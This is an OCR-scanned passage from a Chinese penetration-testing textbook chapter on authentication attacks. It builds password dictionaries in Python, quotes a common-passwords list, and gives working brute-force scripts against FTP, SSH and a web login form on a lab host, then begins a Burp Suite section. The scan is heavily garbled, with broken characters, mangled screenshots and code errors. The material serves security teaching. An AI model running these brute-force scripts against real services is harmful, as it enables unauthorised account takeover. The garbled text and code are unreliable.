于 生成 字典 文件 。 

product() 函数 : 它 可 以 用 来 获得 多 个 循环 器 的 笛 卡 儿 积 ,例如 product('xyz', [0, 1), 44 
到 的 结果 就 是 x0,y0, z0, xl, yl, zl. 

permutations('abcd', 2) # : 从 'abcd' 中 挑选 两 个 元 素 ， 例 如 ab ，bc，…， 并 将 所 有 结果 排 
序 ， 返 回 为 新 的 循环 器 。 这 些 元 素 中 的 组 合 是 有 顺序 的 ， 同 时 生成 cd 和 dc。 

combinations('abc', 2) # : 从 'abcd' 中 挑选 两 个 元 素 ， 例 如 ab，bc，…， 将 所 有 结果 排序 ， 
返回 为 新 的 循环 器 ， 这 些 元 素 中 的 组 合 是 没有 顺序 的 ， 例 如 c 和 d 只 能 生成 cdo 

有 了 itertools 这 个 库 ， 就 可 以 很 轻松 地 生成 一 个 字典 文件 。 

接 下 来 介绍 一 个 简单 的 字典 文件 生成 过 程 。 

第 一 步 : 导入 itertools 库 。 

>>>import itertools 

第 二 步 : 指定 生成 字典 的 字符 ， 这 里 使 用 所 有 的 英文 字符 和 数字 (但 是 没有 考虑 大 小 写 
和 特殊 字符 )。 

>>>words = "1234568790abcdefghijklmnopqrstuvwxyz" 

第 三 步 : 接 下 来 需要 使 用 itertools 中 提供 的 循环 器 来 生成 字典 文件 ， 这 里 可 以 根据 不 同 
的 需求 来 选择 ， 在 这 里 选择 permutations， 既 考虑 选项 ， 又 考虑 顺序 。 这 里 考虑 到 程序 运行 
的 速度 ， 仅 出 于 演示 的 目的 ， 所 以 选择 了 生成 两 位 的 密码 。 在 真实 情景 中 往往 需要 生成 6 位 
以 上 的 密码 ， 但 这 需要 很 长 的 时 间 。 

>>>temp =itertools.permutations(words,2) 

第 四 步 : 打开 一 个 用 于 保存 结果 的 记事 本 文件 。 

>>>passwords = open("dic.txt","a") 

第 五 步 : 使 用 一 个 循环 将 生成 的 密码 写 入 到 一 个 记事 本 文件 中 。 

>>>for i in temp: 


passwords.write("".join(i)) 
passwords.write("".join("Nn")) 


完整 的 程序 如 下 所 示 。 


import itertools 
words = "1234568790abcdefghijklmnopqrstuvwxyz" 
temp =itertools.permutations (words, 2) 
passwords = open("dic.txt","a") 
for i in temp: 
passwords.write("".join(i)) 
passwords.write("".join("Nn")) 
dic.close () 
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这 里 有 一 个 技巧 ， 如 果 已 经 获悉 目标 的 密码 为 几 个 特定 的 字符 ， 例 如 “q”“w”“e” 等 ， 
那么 可 以 由 用 户 输入 这 几 个 字符 。 


import sys 

if len(sys.argv)!=3: 
print"input: <The char of pass><The length of pass>" 
sys.exit(1) 

words=sys.argv[1] 

n=sys.argv[2] 

temp =itertools.permutations (words,n) 

pass = open("dic.txt","a") 

for i in temp: 
pass.write("".join(i)) 
pass.write("".join("Nn")) 

dic.close () 


除了 自己 生成 字典 之 外 ， 建 议 到 互联 网 上 下 载 一 些 优秀 的 字典 文件 。https://wiki.skullse- 
curity.org/Passwords 中 提供 了 一 些 相 当 有 效 的 字典 ， 这 个 网 页 如 图 10-5 所 示 。 


Yr | © httpsy//wiki.skullsecurity.org/Passwords 


x ji ) Passwords - SkullSecurity x | + 
L pege | [ discussion | | view source | | history | — i 
Passwords 
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Password dictionaries 


These are dictionaries that come with tools/voras/etc, designed for cracking passwords. As far as I know, T m not breaking any licensing agreements by mirroring $ 


=. Cempressed — 
John the Ripper 加 john. txt b22 (9 
Cain & bl 9 eain tet. bz2 P 


confi cker. txt. bz2 (9 


S00-worst-passwords. txt bz2 P 


370 Banne 
passwords (9 


witter 


twitter-banned txt bz2 9 


图 10-5 Wiki 上 提供 的 字典 页 面 
在 这 个 页 面 中 下 载 一 个 典型 的 弱 口 令 字典 “500 worst passwords”， 这 个 字典 中 包含 使 用 
频 度 最 高 的 500 个 词汇 ， 例 如 : 


123456 
password 
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12345678 
1234 
pussy 
12345 
dragon 
qwerty 
696969 
mustang 
letmein 
baseball 
master 
michael 
football 
shadow 
monkey 
abc123 
pass 
fuckme 
6969 
jordan 
harley 
ranger 
iwantu 
jennifer 
hunter 


目前 互联 网 上 有 各 种 各 样 的 字典 文件 ， 这 些 文件 最 小 的 只 有 几 千 字 节 ， 最 大 的 达到 了 几 
百 吉 字 节 ， 里 面包 含 的 内 容 也 都 各 不 相同 。 但 是 在 应 用 这 些 字典 之 前 ， 最 好 也 要 收集 到 关于 
目标 足够 多 的 信息 ， 例 如， 如 果 目 标 密码 是 由 一 个 不 懂 外 语 的 中 国人 设置 的 ， 那么 显然 不 应 
该 再 使 用 那些 由 英文 单词 组 成 的 词典 。 

HT, 现在 手 里 已 经 有 了 可 以 使 用 的 字典 文件 。 这 些 文件 无 论 大 小 ， 它 们 的 特点 都 是 一 
Hpne sa “i 下 来 编写 一 个 用 来 读 取 字典 文件 的 程序 。 把 刚才 下 载 的 文件 放置 于 root 
HRF, 开始 编 这 个 程序 

首 ew open apina 并 将 这 个 文件 传递 给 一 个 变量 fp- 

>>> fp=open("/root/500-worst-passwords.txt","r") 


其 次 ， 按 行为 单位 使 用 循环 来 读 取 文件 中 的 内 容 。 


>>> while 1: 
line=fp.readline() 
passwd=line.strip('\n') 
print passwd 


执行 的 结果 如 图 10-6 所 示 。 | 
可 以 将 这 个 功能 封装 成 为 一 个 函数 ， 使 用 时 只 图 10-6 使 用 Python 读 出 的 字典 内 容 
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需要 将 读 取 到 的 每 一 个 记录 作为 参数 传递 给 破解 用 的 函数 即 可 ， 读 取 字 典 文件 的 函数 名 为 
GetPassword()。 
def GetPassword() : 
fp = open("password.txt","r") 
if fp == 0: 
print ("open file error!") 
return; 
while 1: 
line = fp.readline() 
if not line: 
break 
passwd = line.strip('\n') 
print passwd 


接 下 来 编写 一 些 针对 各 种 常见 协议 的 破解 过 程 ， 首 先 就 是 最 为 常见 的 FTP。 


10.3 FTP 暴力 破解 模块 


FTP 是 File Transfer Protocol (文件 传输 协议 ) 的 简称 ， 中 文 简称 为 “ 文 传 协议 ”， 用 于 在 
Internet 上 控制 文件 的 双向 传输 。 同 时 ， 它 也 是 一 个 应 用 程序 (Application)。 使 用 FTP 时 必 
须 首先 登录 ， 在 远程 主机 上 获得 相应 的 权限 以 后 ， 方 可 下 载 或 上 传 文件 。 也 就 是 说 ， 要 想 同 
哪 一 台 计 算 机 传送 文件 ， 就 必须 具有 哪 一 台 计 算 机 的 适当 授权 。 换 言 之 ， 除 非 有 用 户 ID 和 
口令 ， 和 否则 便 无 法 传送 文件 。 

不 过 现在 大 部 分 FTP 都 提供 了 匿名 登录 的 机 制 ， 这 种 FTP 可 以 使 用 用 户 名 “anonymous” 
和 任意 的 密码 来 登录 。 考 虑 的 主要 是 如 何 去 对 那些 设置 了 用 户 名 和 密码 限制 的 FTP 进行 
破解 。 

其 实 每 一 个 破解 模块 的 编写 都 并 非 是 一 件 简单 的 事情 ， 这 个 过 程 需 要 编写 者 掌握 编程 语 
言 的 语法 、 要 破解 目标 程序 的 工作 流程 和 对 应 的 库 文件 等 。 下 面 在 开始 破解 之 前 ， 先 来 了 解 
一 下 FTP 的 工作 流程 。 

(1) 客户 端 去 连接 目标 FTP 服务 器 的 21 号 端口 ， 建 立 命令 通道 。 服 务 器 会 向 客户 端 发 
送 “220 Free Float Ftp Server ( Version 1.00 )” 回 应 ， 括 号 内 的 信息 会 因为 服务 器 不 同 而 有 不 
同 的 显示 。 

(2) 客户 端 向 服务 器 发 送 “ USER 用 户 名 \rm”"， 服务器 会 返回 “331 Please specify the 
password .\r in” 。 

(3) 客户 端 向 服务 器 发 送 “ PASS 密码 \rn”"， 如 果 密 码 认证 成 功 服 务 器 会 返回 “230 
User Logged in rn”， 如 果 密 码 认证 错误 服务 器 会 返回 “200 Switching to Binary mode.\rn”。 

这 里 仅 介绍 了 FTP 登录 过 程 的 前 面 三 个 步骤 ， 后 面 的 步 又 由 于 与 破解 模块 的 编写 联系 不 
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大 ， 这 里 就 不 再 详细 介绍 。 

Python 中 默认 就 提供 了 一 个 专门 用 来 对 FTP 进行 操作 的 ftplib 模块 ， 这 个 模块 很 精简 ， 
里 面 提供 了 一 些 用 来 实现 登录 、 上 传 和 下 载 的 函数 。 

(1) ftp.connect("IP", "port") # 连接 的 FTP Server 和 端口 。 
", "password")# 连接 的 用 户 名 ， 密 码 。 

(3 ) ftpxretrlines(command[, callback])# 使 用 文本 传输 模式 返回 在 服务 器 上 执行 命令 的 
结果 。 

下 面 使 用 ftplib 函数 按照 登录 流程 进行 操作 

首先 ， 导 入 需要 使 用 的 ftplib 库 文 件 

>>> import ftplib 

其 次 ， 使 用 ftplib 创建 一 个 FTP 对 象 

>>> ftp=ftplib.FTP("192.168.169.133") 

调用 这 个 对 象 中 的 connect() 函数 去 连接 目标 的 21 号 端口 

>>> ftp.connect ("192.168.169.133",21,timeout=10) 


执行 的 结果 如 图 10-7 所 示 


(2 ) ftp.login("user", 


8.169.133",21,timeout=10) 


图 10-7 ”成功 连接 FTP 


调用 这 个 对 象 中 的 login) 函数 使 用 admin 作为 用 户 名 test 作为 密码 来 登录 
>>> ftp.login("admin","test") 


如 果 登 录 成 功 ， 就 会 得 到 一 个 230 回应 ， 如 图 10-8 所 示 


>>> ftp. login(" "admin", "test") 


图 10-8 成 功 登录 FTP 


然后 可 以 使 用 LIST 命令 (这 是 FTP 本 身 的 命令 ) 来 展示 FTP 服务 器 中 的 文件 
>>> ftp.retrlines('LIST') 


这 条 命令 执行 的 结果 如 图 10-9 所 示 。 


24 Jun 11 2 
19 Jun 11 


File sent ok 


图 10-9 在 FTP 上 执行 LIST 命令 
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最 后 ， 可 以 使 用 quit() 函数 断 开 与 FTP 服务 器 


的 连接 。 
>>> ftp.quit() 
>>> ftp.quit() '221 Goodbye. ' 
执行 的 结果 如 图 10-10 所 示 图 10-10 断 开 与 FTP 的 连接 


接 下 来 编写 一 个 使 用 指定 用 户 名 和 密码 来 登录 FTP 服务 器 的 Python 程序 。 


def Login (FTPServer, userName, passwords): 
try: 
f = ftplib.FTP (FTPServer) 
f.connect (FTPServer, 21, timeout = 10) 
f.login (userName, passwords) 
f.retrlines('LIST') 
.quit() 
print 'We get right password! ' 
except ftplib.all_errors: 
pass 


mh 


下 面 将 这 两 个 程序 整合 成 一 个 完整 的 破解 程序 。 这 里 需要 同时 考虑 用 户 名 和 密码 ， 但 
是 ， 如 果 在 用 户 名 和 密码 都 不 知道 的 情况 下 ， 使 用 暴力 破解 的 难度 会 变 得 非常 大 。 在 目标 主 
机 192.168.169.133 上 建立 一 个 FTP 服务 器 ， 这 里 使 用 的 工具 是 “简单 FTP Server”, XAT. 
具 的 使 用 很 简单 ， 操 作 界 面 如 图 10-11 所 示 

这 里 面 的 1 和 2 处 可 以 设置 用 户 名 和 密码 ， 在 3 处 可 以 切换 启动 和 停止 状态 。 当 服务 端 
启动 了 验证 身份 之 后 ， 客 户 端 处 如 果 不 能 输入 正确 的 用 户 名 admin 和 密码 test， 就 无 法 访问 
这 个 FTP， 如 图 10-12 所 示 


权限 

国 下 载 文件 回 上 传 文件 回 删除 文件 国文 件 改名 回 新 建 目 录 
其 他 

服务 端口 21 最 大 连接 数 100 

共享 目录 C:\ 


mw aq81T en 


图 10-11 简单 FTP Server 界面 图 10-12 登录 失败 
接 下 来 编写 一 个 可 以 对 这 个 FTP 服务 进行 暴力 破解 的 程序 。 


import ftplib 
import sys 
if len(sys.argv)!=4: 
print "FTPbrute.py <FTPServer> <UserDic> <PasswordDic>" 


第 10 章 身份 认证 攻击 < 205 


sys.exit (1) 
FTPServer =sys.argv[1] 
UserDic=sys.argv[2] 
PasswordDic=sys.argv[3] 
def Login(FTPServer, userName, passwords): 
try: 
f = ftplib.FTP (FTPServer) 
f.connect (FTPServer, 21, timeout = 10) 
f.login (userName, passwords) 
f.quit() 
print "The userName is %s and password is %s" %(userName,passwords) 
except ftplib.all_errors: 
pass 
userNameFile= open (UserDic,"r") 
passWordsFile = open (PasswordDic,"r") 
for user in userNameFile.readlines (): 
for passwd in passWordsFile.readlines (): 
un = user.strip('\n') 
pw = passwd.strip('\n') 
Login (FTPServer, un, pw) 


在 Aptana Studio 3 中 完成 这 个 程序 ， 将 这 个 程序 以 “FTPbrutepy” 为 名 保存 起 来 ， 在 
Run Configurations 中 为 这 个 程序 指定 三 个 参数 
“192.168.169.133 /root/name.txt /root/500-worst- [E Console x | 而 root@kali:~ £ Problems mPyUnit 
passwordstxt"， 这 里 面 的 nametxt 是 作者 自己 ”| 本 sa N 
编写 的 ， 里 面具 有 三 个 单词 , “ administrator ” 
“admin” NW “root”, I 500-worst-passwords.txt 
是 刚刚 下 载 的 ， 执 行 的 结果 如 图 10-13 所 示 。 图 10-13 ”扫描 得 到 用 户 名 和 密码 

由 图 10-13 可 以 看 出 来 ， 程 序 已 经 成 功 地 破解 了 目标 的 用 户 名 和 密码 。 


10.4 SSH 暴力 破解 模块 


SSH X Secure Shell 的 缩写 ， 由 IETF 的 网 络 小 组 (Network Working Group) 所 制定 。 
SSH 是 建立 在 应 用 层 基础 上 的 安全 协议 。SSH 是 目前 较 可 靠 ， 专 为 远程 登录 会 话 和 其 他 网 络 
服务 提供 安全 性 的 协议 。 利 用 SSH 协议 可 以 有 效 防 止 远 程 管理 过 程 中 的 信息 泄露 问题 。 

这 个 协议 和 Telnet 协议 一 样 ， 都 可 以 用 来 实现 远程 管理 ， 但 是 Telnet 由 于 在 传输 的 过 程 
中 没有 使 用 任何 的 加 密 方式 ， 所 以 被 认为 是 不 安全 的 ， 而 SSH 则 成 为 目前 远程 管理 首选 的 
协议 。 

相 比 FTP， 除 了 功能 上 有 所 不 同 之 外 ，SSH 登录 的 过 程 也 要 复杂 一 些 ， 首 先 建立 一 个 
SSH 服务 器 ， 在 Linux 系统 中 建立 一 个 SSH 服务 器 很 简单 。 这 里 为 了 演示 起 见 ， 下 载 一 款 名 
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为 WinSSHD 的 工具 ， 这 款 工具 很 简单 ， 可 以 运行 在 Windows 操作 系统 中 。 一 台 主 机 在 安装 


WinSSHD 之 后 ， 就 会 变 成 一 个 SSH 服务 器 ， 就 可 以 从 远程 使 用 Windows 系统 的 用 户 名 和 密 
码 来 登录 ， 这 个 软件 的 工作 界面 如 图 10-14 所 示 。 


MOS fingerprint 0920-f764 47:96:cəe ap Se: a:21:d2 3c 1:36 Copy 
Babbic -Bebbic sea ake ho treed sosy edane teevee Copy 


No RSA hos: tey 5 curenty engloyed 
Hanage host keys 


© setunos 


tam settings Vew setings lroort Erert 
@ password cache 


Passwords n cache: © Manage password cache 


图 10-14 WinSSHD 的 界面 
只 需要 简单 单 击 Start WinSSHD 即 可 启动 本 机 的 SSH 服务 。 


如 果 要 访问 这 个 服务 器 就 必须 安装 客户 端 软件 。 目 前 最 流行 的 SSH 客户 端 工 具 要 数 
PuTTY， 这 里 就 用 这 个 工具 来 登录 ， 如 图 10-15 所 示 。 


R è puriy Configuration = 


Category: 
E Session Basic options for your PuTTY session 
Logging 
En Sea Da E w 
z 多 
Features Connection type: 
E Window ©Raw (ene © Rogn @SSH © Sejal 
er Load. save or delete a stored session 
Translation Saved Sessione 
Selection 
Colours Defaut Seting: 
E- Connection i jJ 
nas Saye 
Proy —— 
Tanet Delete 
Riogn 
由 SSH 
ses Gose wndow on ext 
© Aways ©Never (@ Only on dean ext 
Les J [ °=_J 


图 10-15 PuTTY 的 工作 界面 
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PuTTY 的 使 用 很 简单 ， 只 需要 输入 IP 地 址 即 可 (除非 SSH 没有 工作 在 默认 端口 )， 然 后 
单 击 Open 按钮 ， 就 会 弹出 一 个 要 求 输入 用 户 名 和 密码 的 命令 行 ， 如 图 10-16 所 示 。 


EP 192.168.169.133 - PuTTY 


图 10-16 一 个 FTP 的 身份 验证 界面 


这 里 面 需 要 输入 目标 系统 (注意 这 里 展示 的 是 Windows， 如 果 没 有 就 为 adminitrator 设 
置 一 个 密码 ) 的 用 户 名 和 密码 。 若 正确 就 会 出 现 如 图 10-17 所 示 的 Windows 命令 行 


[P isz3ca 9.135 - Puriy 一 日 二 


图 10-17 使 用 PyTTY 成 功 登录 

好 了 ， 刚 看 到 一 个 SSH 远程 登录 的 过 程 。 这 个 过 程 必须 有 一 个 客户 端 ， 这 一 
带 来 了 麻烦 。 因 为 在 使 用 FTP 的 过 程 中 ， 是 直接 登录 的 ， 而 SSH: 的 数据 需要 力 
点 由 我 们 自己 来 实现 ， 工 作 量 是 很 大 的 ， 对 一 些 仅 需 要 实现 这 个 功能 ， 却 不 需要 考虑 细节 
程序 员 来 说 ， 这 份额 外 的 工作 显然 是 不 必要 的 

所 以 下 面 介绍 一 个 专门 用 来 处 理 SSH 远程 登录 的 Python 库 : pxssh。 这 个 库 主 要 有 如 下 
几 个 函数 

(1 ) connect(host,user,password): m H H EREHLAFHY SSH 连接 。 

(2) send_command(s,cmd): 发 送 命 

) logout(): 释放 该 连接 
(4) prompt): 等 待 提示 符 ， 通 常用 于 等 待命 令 执行 结束 
利用 这 个 pxssh 库 ， 只 需要 对 前 面 的 FTP 代码 进行 一 点 儿 修改 即 可 


， 这 一 


的 


import sys 
from pexpect import pxssh 
if len(sys.argv)!=4: 
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print "SSHbrute.py <SSHServer> <UserDic> <PasswordDic>" 
sys.exit(1) 
SSHServer =sys.argv[1] 
UserDic=sys.argv[2] 
PasswordDic=sys.argv[3] 
def Login(SSHServer, userName, passwords): 
try: 
s = pxssh.pxssh() 
s.login (SSHServer, userName, passwords) 
print "The userName is %s and password is %s" $%(userName, passwords) 
except: 
print '[-] Error Connecting' 
userNameFile= open (UserDic,"r") 
passWordsFile = open (PasswordDic,"r") 
for user in userNameFile.readlines(): 
for passwd in passWordsFile.readlines() : 
un = user.strip('\n') 
pw = passwd.strip('\n') 
Login (SSHServer, un, pw) 


pxssh 类 存在 于 pexpect 模块 里 ，Kali Linux 2 中 默认 安装 了 这 个 模块 ， 如 果 没 有 安装 此 
模块 ， 请 自行 安装 ， 如 果 已 经 存在 此 模块 ， 但 是 没有 pxssh 类 ， 可 能 是 由 于 模块 的 版 本 太 低 ， 
更 新 至 新 版 本 即 可 解决 ， 更 新 的 命令 如 图 10-18 所 示 


root@kali: ~ # pip install --upgrade Pexpect 


| 61kB 101kB/s 


ing ptyproc none-any.whl 
lling collected es: ptyprc ; ect 
ptypr 5.1 
s usr/lib/python2.7/dist-packages, outside env 


python2.7 


图 10-18 pexpect 模块 的 安装 过 程 


10.5 Web 暴力 破解 模块 


在 现实 生活 中 ，Web 页 面 中 需要 输入 用 户 名 和 密码 的 情况 更 为 常见 。 接 下 来 编写 一 个 
对 Web 页 面 的 用 户 名 和 密码 进行 暴力 破解 的 程序 。 首 先 搭建 一 个 测试 用 的 服务 器 ， 这 里 在 
Windows 7 (IP 地 址 为 192.168.169.133 ) 上 面 安装 一 个 Easy File Sharing Web Server 软件 ， 成 
功 安装 之 后 ， 运 行 这 个 软件 就 可 以 在 80 端口 上 对 外 提供 HTTP 服务 ， 现 在 在 Kali Linux 2 中 
使 用 浏览 器 访问 http: //192.168.169.133， 如 图 10-19 所 示 。 
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Login - powered by Easy File Sharing Web Server - Mozilla Firefox 
Login - powered by Easy - x | + 
ODE 192.168.169.133 e |[Q Search lze v 
E Most Visited v JifOffensive Security Ó, Kali Linux ‘Ñ Kali Docs ‘Ñ Kali Tools [BExplott-DB Wà Aird 


@........ 


Note: Usemame and Password are case sensitive. 


Usemame: [oo UU Ji vant to mgster 
Passwort [aaa]! fotgot my password 
L Login! | C remember me 


ban as a guest | secure pon 


k 


图 10-19 Easy File Sharing Web Server 的 登录 页 面 


如 果 使 用 正确 的 用 户 名 和 密码 登录 ， 就 可 以 跳 转 到 一 个 文件 操作 界面 ， 如 图 10-20 
所 示 。 


Virtual Folders - powered by Easy File Sharing Web Server -| 
Virtual Folders - powered.. x \ + 
Q £ ) © | 192.168.169.133/forum.ghp e | Q Search 


Most Visited v BOffensive Security ‘Ñ Kali Linux ‘Ñ Kali Docs ‘Ñ Kali Tools ED 


Forums (virtual Folders @ user Setting [ÜBLogout[root] 


Virtual Folders 


F> disk c 
Disk C on the server 


J 
y 


disk d 
Disk D on this computer 


root 
Virtual folder for root, created on: 2017-11-19 09:03:36 


Poweed by Easy Fe Shang Web Sener 
Copyight © 2004 EFS Soflware mc 


图 10-20 成 功 登录 之 后 的 操作 界面 


如 果 输 入 了 错误 的 用 户 名 和 密码 ， 就 会 出 现 一 个 错误 的 用 户 名 和 密码 界面 ， 如 图 10-21 
所 示 。 
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r 


Easy File Sharing Web Server - Mozilla Firefox 
J Easy File Sharing Web Se.. x || + 


(€J G 192.168.169.133/rorum.ghp © |[Q Search ] wi ! 


Es Most Visited v RBOffensive Security ‘Ñ Kali Linux ‘Ñ Kali Docs W, Kali Tools RJExploit-DB W 


Easy File Sharing Web Server 


Invalid username or password. Please click here to try again. 


图 10-21 登录 失败 的 界面 


但 是 ， 对 于 这 个 过 程 仅 了 解 到 这 个 层次 还 不 够 ， 还 需要 进一步 从 数据 包 的 层次 进行 解 
析 。 首 先 启动 WireShark， 并 将 过 滤器 设置 为 只 接受 与 192.168.169.133 通信 的 HTTP 类 型 数 
据 包 ， 然 后 再 在 浏览 器 中 执行 登录 操作 ， 如 图 10-22 所 示 。 


Fle Edt View Go Capture Analyze Statistics Telephony Wireless Tools Help 
WBO DEROA < + ae Aaaa 
Ñ ip.addr == 192.168.169.133 && http 


EE -] Expression. + 


No. Tin Source Destination Protocol Lengt 


» Ethernet II, Src: 00:0c:29:23:1e f4, Dst: 00;0c;29 
» Internet Protocol Version 4, Sre. 102.168.169.132, ‘st 492 ma T EA 
B0, Se 


» Transmission Control Protocol, Sre Port: 52954, Dst Port: Ack: 1, Len: 583| 


图 10-22 使 用 WireShark 捕获 的 登录 数据 包 

上 面 显 示 的 是 捕获 到 的 登录 数据 包 ， 从 这 里 面 可 以 看 出 来 在 整个 登录 过 程 中 ， 其 实 就 是 
使 用 POST 方法 向 目标 提交 了 以 下 4 个 表 项 。 

(1) frmLogin: HRA, BEH “true”, 

(2) frmUserName: 输入 的 用 户 名 。 

(3) frmUserPass: 输入 的 密码 。 

(4) login: 登录 选项 ， 默 认 值 为 “Login !” 

接 下 来 编写 一 个 可 以 模拟 这 个 登录 过 程 的 Python 程序 ， 这 里 需要 引入 两 个 库 文件 : 
requests 和 urllib。requests 是 一 个 十 分 有 用 的 模块 ， 可 以 轻松 地 使 用 它 在 网 络 中 发 送 数据 包 。 
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HIFA Request 模块 。 

>>> import requests 

Request 中 提供 了 两 种 HTTP 请 求 方法 : GET 和 POST. HEF, GET 是 从 指定 的 资源 请 
求 数据 ，POST 是 向 指定 的 资源 提交 要 被 处 理 的 数据 。 

然后 可 以 使 用 requests 中 的 get() 方法 来 读 取 。 

>>> r = requests.get('http://192.168.169.133') 

也 可 以 使 用 requests 中 的 post() 方法 来 提交 请 求 ， 这 里 根据 之 前 抓 包 的 结果 ， 提 交 的 地 
址 为 “http://192.168.169.133/forum.ghp”， 提 交 的 表 项 包括 如 下 4 项 。 


>>>payload={"frmLogin":"true", "frmUserName":"root","frmUserPass":"123456", "logi 
Dogins"y 


然后 可 以 使 用 post() 方法 来 提交 请 求 ， 这 个 方法 需要 一 个 地 址 和 提交 的 内 容 。 

>>> resp-requests.post ("http://192.168.169.133/forum.ghp", payload) 

针对 不 同 的 Web 应 用 程序 ， 需 要 对 其 进行 研究 。 在 对 目标 开始 真正 渗透 测试 之 前 ， 如 果 
可 以 找到 目标 程序 的 源 文件 ， 并 搭建 一 个 虚拟 环境 ， 就 可 以 大 大 地 提高 成 功率 。 

首先 构造 一 个 包含 正确 用 户 名 和 密码 的 payload。 


payload=("AdminName":"1i","AdminPassword":"123456","Submit":"N310N267N266N250") 
resp=requests.post( "http://192.168.169.133/webadmin/login.asp",payload) 


通过 WireShark 捕获 这 个 过 程 的 数据 包 ， 过 程 如 图 10-23 所 示 。 


File Edit View Go Capture Anayze Statistics Telephony Wireless Tools Help 
a m @ p T S S < + ..ə w # Z [Ə e a a F 


[ up EEI -] Expression.. + 
Pass, p 


No Tin Source Destination 


309 GET PUES aq asp TT/ 


SE 168. 169; 132 192: iee. .169. 133 HTTP 
529 HTTP/1.1 200 OK (text/html 


= 492.168.169.133 192.168.169.132 HTTP 


图 10-23 ”使 用 WireShark 捕获 到 数据 包 


注意 ，resp 是 发 出 数据 包 以 后 得 到 的 回应 ， 但 是 这 里 面 resp 并 不 是 第 二 个 数据 包 ， 而 是 
图 10-23 中 的 第 4 个 数据 包 ， 这 个 数据 包 的 返回 状态 为 “200 OK” o ERZ Python 编程 的 例 
子 中 ， 都 是 使 用 返回 状态 来 判断 程序 是 否 找到 了 正确 的 用 户 名 和 密码 ， 例 如 ，302 是 找到 正 
确 用 户 名 和 密码 ，200 则 是 错误 ， 或 者 200 是 找到 正确 的 用 户 名 ，302 是 错误 。 现 在 查看 输 
和 人 正确 的 用 户 名 和 密码 的 结果 ， 如 图 10-24 所 示 。 

接 下 来 向 这 个 程序 发 送 一 个 包含 错误 用 户 名 和 密码 ` 
的 payload。 图 10-24 打印 出 resp 的 内 容 


payload={"AdminName" : "test", "AdminPassword" :"abc", "Submit" :"\310\267\266\250"} 
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resp=requests.post( "http://192.168.169.133/webadmin/login.asp",payload) 


通过 WireShark 捕获 这 个 过 程 的 数据 包 ， 过 程 如 图 10-25 所 示 。 


192.168.169.132 192.158.169.133 HTTP 352 POST /webadmin/login.asp HTTP/1.1 (api 
192.168.169.133 192.158.169.132 HTTP 380 HTTP/1.1 200 OK (text/htnl) 


图 10-25 ”捕获 到 的 登录 数据 包 

这 个 过 程 只 有 两 个 数据 包 ， 一 个 是 192.168.169.132 发 出 的 请 求 ， 另 一 个 则 是 服务 器 给 
出 的 回应 ， 如 果 返 回 数据 包 也 就 是 resp 的 返回 状态 是 302， 就 比较 理想 了 。 不 过 当 再 次 执行 
print resp 时 ， 得 到 的 结果 如 图 10-26 所 示 。 

这 时 ， 可 以 发 现 无 论 输 入 的 用 户 名 和 密码 正确 与 
否 ， 返 回 数据 包 的 状态 都 是 200， 就 不 能 利用 这 个 值 来 
区 分 了 。 

不 过 无 须 担心 ， 正 确 的 用 户 名 和 密码 一 定 会 和 错误 的 有 所 区 别 。 输 入 正确 的 用 户 名 和 密 
码 应 该 转向 到 控制 页 面 ， 输 入 了 错误 的 用 户 名 和 密码 则 不 会 跳 转 到 这 个 页 面 ， 所 以 可 以 从 这 
里 人 手 。 这 里 查看 resp.url 属性 的 值 ， 首 先 查 看 输入 正确 的 时 候 ， 如 图 10-27 所 示 。 

再 来 查看 一 下 输入 错误 的 时 候 ， 如 图 10-28 所 示 。 


图 10-26 输入 正确 时 resp 的 内 容 


>> resp.url 


u'http://192.168.169.133/w 33/webadmin/[ogIn asp” 


图 10-27 输入 正确 时 resp.url 的 内 容 图 10-28 输入 错误 时 resp.url 的 内 容 


这 里 如 果 正 常 登录 ， 应 该 返回 的 是 http://192.168.169.133/webadmin/main.asp'， 如 果 登 录 
错误 ， 返回 的 为 'http://192.168.169.133/webadmin/login.asp' 

只 需要 使 用 resp.url== 'http://192.168.169.133/webadmin/main.asp' 作为 条 件 来 判断 用 户 名 
和 密码 是 否 正确 ， 


10.6 使 用 Burp Suite 对 网 络 认 证 服务 的 攻击 

Burp Suite 是 用 于 攻击 Web 应 用 程序 的 集成 平台 。 这 个 平台 中 集成 了 许多 工具 。 本 节 只 
讲述 其 中 的 一 个 重要 功能 ， 就 是 如 何 使 用 它 来 破 
解 一 些 网 站 的 密码 。 首 先 查看 一 个 有 用 户 名 和 密 


码 的 登录 界面 ， 如 图 10-29 所 示 。 管理 员 登 录 
接 下 来 简单 介绍 这 个 页 面 登 录 的 流程 。 简 单 Re O = 


来 说 ， 用 户 登录 这 个 页 面 ， 在 这 个 页 面 中 的 两 个 
文本 框 中 输入 用 户 名 “admin” 和 密码 “123456” 
之 后 单 击 “ 确 定 ” 按 钮 ， 这 个 页 面 就 会 将 这 个 用 


图 10-29 一 个 需要 用 户 名 和 密码 的 登录 界面 
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户 名 “admin” 和 密码 “123456” 打 包 成 数据 包 然 后 提交 到 服务 器 端 进行 验证 ， 先 将 这 个 数 
据 包 称 为 数据 包 A。 

然后 使 用 “admin” 作 为 用 户 名 ,“abc123” 作 为 密码 登录 一 次 ， 这 次 产生 的 数据 包 称 为 
数据 包 B. 

对 两 个 数据 包 A 和 了 B 进行 比较 ， 就 会 发 现 其 实 两 个 数据 包 之 间 除 了 密码 处 不 一 样 之 外 
其 他 地 方 都 是 一 样 的 

可 以 设想 一 下 ， 在 破解 密码 时 只 需要 将 数据 包 A 复制 10 000 个 ， 然 后 使 用 各 种 可 能 的 
密码 ， 例 如 “abcdef”“111111”“000000” 来 替换 “123456”， 这 样 就 产生 了 10 000 个 只 
密码 项 不 同 的 数据 包 ， 将 这 些 数据 包 发 送 到 服务 器 ， 然 后 查看 服务 器 的 反应 ， 就 可 以 得 出 这 
10000 个 密码 中 哪个 是 正确 的 (当然 也 有 可 能 都 不 正确 ， 那 就 需要 使 用 更 多 的 密码 )。 不 过 实 
际 情况 要 比 这 复杂 一 些 ， 因 为 要 涉及 校 验 码 等 操作 

了 解 了 这 个 思路 以 后 ， 就 可 以 来 具体 实现 这 种 攻击 方式 。 不 过 需要 一 个 工具 来 实现 这 
一 切 ， 这 里 使 用 Burp Suite 来 作为 工具 ,首先 在 Kali Linux 2 中 启动 这 个 工具 ， 如 图 10-30 
所 示 


图 10-30 fE Applications 中 启动 Burp Suite 


Burp Suite 在 这 里 的 主要 作用 是 在 用 户 使 用 的 浏览 器 和 目标 服务 器 之 间 充 当 一 个 中 间 人 的 
角色 。 这 样 当 在 浏览 器 中 输入 数据 之 后 ， 数 据 包 就 是 首先 提交 到 Burp Suite 处 ，Burp Suite 可 
